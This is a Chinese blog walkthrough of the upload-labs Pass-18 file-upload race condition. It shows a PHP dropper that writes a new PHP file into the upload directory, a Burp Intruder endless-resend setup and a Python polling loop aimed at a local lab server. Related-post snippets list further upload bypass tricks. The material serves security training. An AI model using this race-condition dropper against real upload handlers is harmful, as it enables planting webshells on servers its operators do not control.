文件上传复习(upload-labs18-19关)

已于 2024-04-25 22:04:38 修改
阅读量217 收藏 4
点赞数 8
文章标签: android
于 2024-04-25 22:04:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80935968/article/details/138198389
版权

Pass-18(条件竞争)

代码和第17关大差不差,所以查看提示

需要用到代码审计

上传图片木马配合解析漏洞进行getshell

新建一句话木马 18.php,代码为:

<?php fputs(fopen('../upload/shell18.php','w'),'<?php phpinfo();?>');?>

只要被成功当作PHP文件解析,就会生成shell18.php 文件

上传文件18.php,并且使用bp抓包

然后将包发送到 Intredur 中

选择狙击手的爆破模式

然后 bp设置无限发送空的Payloads,来让它一直上传该文件

选择Null payloads,然后选择无限循环(Continue indefinitely)

同时打开python脚本并运行

python脚本代码:

import requests
url = "http://192.168.114.200/upload-labs-master/upload/18.php"
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break
    else:
        print("发包中")

在python脚本运行后,burpsuite开始无限制重放数据包

直到python脚本出现OK,再关闭burpsuite

打开根目录,可以看见shell18文件已经被成功上传

使用文件包含漏洞upload-labs/include.php?file=upload/构造url

成功访问

张张@2005
关注
  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
upload-labs19-20以及总结1
08-08
第一步:直接上传php文件,保存名称填成PHP第二步:抓包分析可以看到filename是文件本来的名称,而save_name是传递的参数,此处改为PHP可以绕过
upload-labs 文件上传靶场 writeup
st0ut的博客
06-05 1900
文件上传靶场练习 前言 文件上传漏洞是一个高危漏洞,想要复习一下,二刷一下文件上传靶场 Pass-01 提示: 本pass在客户端使用js对不合法图片进行检查! 通过提示发现是在客户端用js进行验证的,js验证实在发送到服务器端之前而验证的,那么我们就可以在此之前做点手脚。 可以先上传一个合法的文件,通过抓包来进行修改参数,就可以绕过这个限制了。 Pass-02 提示 本pass在服务端对数据...
文件上传upload-labs(二)
qq_43571759的博客
03-04 707
pass-11 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['nam...
upload-labs刷记录
0verWatch的博客
02-08 5354
闲来无聊,把upload-labs所有的卡都刷一遍,就当复习一下文件上传漏洞的各种绕过技巧吧,做完一再看看源代码提高一下审计能力挺好的 Pass-01 一个前端检测,可以禁用js,也可以直接抓包就可以绕过上传 访问成功 Pass-02 Content-Type绕过,直接把Content-Type改为图片类型即可 上传成功 Pass-03 这一是另类的文件名的绕过,可以尝试phtml,...
upload-labs通手册
怪味巧克力的博客
04-20 962
最近在练习文件上传,同事记录一下自己练习的过程,既能帮助自己以后复习,同事也能帮到初学者。 主要用到的工具是Burpsuite。首先我们应该明白上传文件的目的是什么,通过上传文件讲web后门上传并成功解析。 Pass-01 首先查看源码 通过源码可以看到,第一是在本地前段进行验证,使用的是前端JS脚本,所以呢,你让它不起作用不就完了,前端我们是可以修改的,在前端JS函数中加上.php文件,然后...
文件上传upload-labs(一)
01-08
使用xampp、phpstudy、docker搭建upload-labs,三者都可,docker最方便但是我不是太熟悉,xampp安装的时候有很多工序,所以我选择的是phpstudy搭建了靶机环境,个人觉得学习文件上传用dvwa好一点,这个用来训练和...
安装upload-labs
10-22
安装upload-labs
upload-labs-master.zip
06-22
文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
安卓部署ffmpeg全平台so并实现命令行调用
codeofcc的博客
05-17 1055
前面的章节实现了ffmpeg全平台so的生成,接下来的步骤就是部署以及使用了,部署so还是比较简单的,用gradle和cmake都可以部署,部署好了就可以直接使用了,如果需要c++进行封装一层,则需要链接,对cmake熟悉的话链接也是比较简单的。以上就是今天讲述的内容,ffmpeg的so部署还是比较容易的,但是命令行的调用会麻烦一些,尤其是要解决ffmpeg退出问题,在c++中比较好解决,java理论上也比较好实现,如果在dart中则会比较麻烦,因为dart的方法通常不能跨线程调用,多线程的情况会出问题。
Android正向开发实现客户端证书认证
dafan0的博客
05-18 347
如果第三方模块被混淆,那hook方式均不能生效。这时就需要根据系统包去定位校验的函数,因此需要对安卓开发者是如何实现客户端证书校验的有一定了解,接下来就介绍这部分内容。开发者实现客户端证书校验的本质是:证书/密钥 + 代码。在形式上有:公钥校验、证书校验和Host(主机)校验。
阿里云服务器下,部署LNMP环境安装wordpress
dl_11的博客
05-14 476
在阿里云环境下部署LNMP服务时,尤其是安装MySQL了时需要注意,和centos7不完全一样。在利用LNMP环境部署wordpress时,一定要先测试LNMP环境没问题,再部署wordpress,不然找问题好麻烦。MySQL和PHP,版本不同,部署和配置的方法不同,所以如果是安装的其他版本的本文章中的方法不一定实用。
安卓手机APP开发__支持64位的架构
红孩儿编程大师
05-15 622
在谷歌的应用中发布的APP需要支持64位的架构。添加上你的APP的64位的版本, 提供了性能上的提升,并且能够运行在仅支持64位的硬件上。
Android Audio基础——AudioFlinger回放录制线程(七)
最新发布
小旭的专栏
05-20 208
PlaybackThread 和 RecordThread 的基类。录制线程类,由 ThreadBase 派生。回放线程基类,同由 ThreadBase 派生。混音回放线程类,由 PlaybackThread 派生,负责处理标识为 AUDIO_OUTPUT_FLAG_PRIMARY、AUDIO_OUTPUT_FLAG_FAST、AUDIO_OUTPUT_FLAG_DEEP_BUFFER 的音频流,MixerThread 可以把多个音轨的数据混音后再输出。
android radiongroup应用举例
xie__jin__cheng的博客
05-18 166
android radiongroup应用举例
掌握Android Intent与IntentFilter的艺术-深入探索匹配规则与实践技巧
w风雨无阻w的专栏
05-14 718
动作匹配Intent中必须包含中声明的至少一个动作。类别匹配Intent中的所有类别必须与中的类别完全一致。数据匹配Intent中的数据必须与中的至少一个数据匹配。假设我们有一个网页浏览器应用,我们希望当用户尝试打开一个http或https协议的网页时,我们的应用能够被系统选中。我们可以在中为相应的Activity定义如下当用户点击一个网页链接时,系统会查找所有能够响应VIEW动作和BROWSABLE类别的组件,并且检查它们的<data>元素是否匹配链接的协议。在这个例子中,我们的将能够响应所有。
Android SDK的安装和配置
Rverdoser的博客
05-17 173
Android SDK的安装和配置是开发Android应用的重要步骤,下面我为你详细介绍一下这个过程:安装Android SDK1. 打开官网:首先,你需要访问Android SDK的官方网站,找到SDK工具的下载链接。2. 下载SDK:在官网上,选择适合你操作系统的SDK版本进行下载。通常,你可以选择ZIP压缩包或EXE安装包,两者在实际使用上没有太大区别。3. 解压并存放:下载完成后,将SDK文件解压到你想要存放的目录。注意,存放路径最好不要包含中文或特殊字符4. 运行安装程序:如果你下载的是EXE安装
android GridLayout 布局详解,并举例
xie__jin__cheng的博客
05-18 349
android GridLayout 布局详解,并举例
upload-labs19
07-28
根据引用\[1\]中的内容,通upload-labs的第19的方法如下: 1. 打开18的myupload.php文件,进行修改,确保上传的图片可以放到upload文件夹下。 2. 与第17类似,这还会检测文件的后缀名,所以需要上传一个图片马,而不是直接上传php文件。 3. 上传一个名为22.gif的图片,并进行抓包。 4. 进行与第17相似的攻击过程,点击"Start Attack"按钮。 5. 完成以上步骤后,即可成功通19。 以上是通upload-labs第19的方法。根据引用\[2\]中的内容,这些方法在实战中可能会有所不同,但基本原理是相似的。希望这些方法能对你的学习有所帮助。 #### 引用[.reference_title] - *1* *2* [upload-labs详解1-19全解(最全最详细一看就会)](https://blog.csdn.net/qq_53003652/article/details/129969951)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [upload-labs通](https://blog.csdn.net/as604049322/article/details/127418017)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值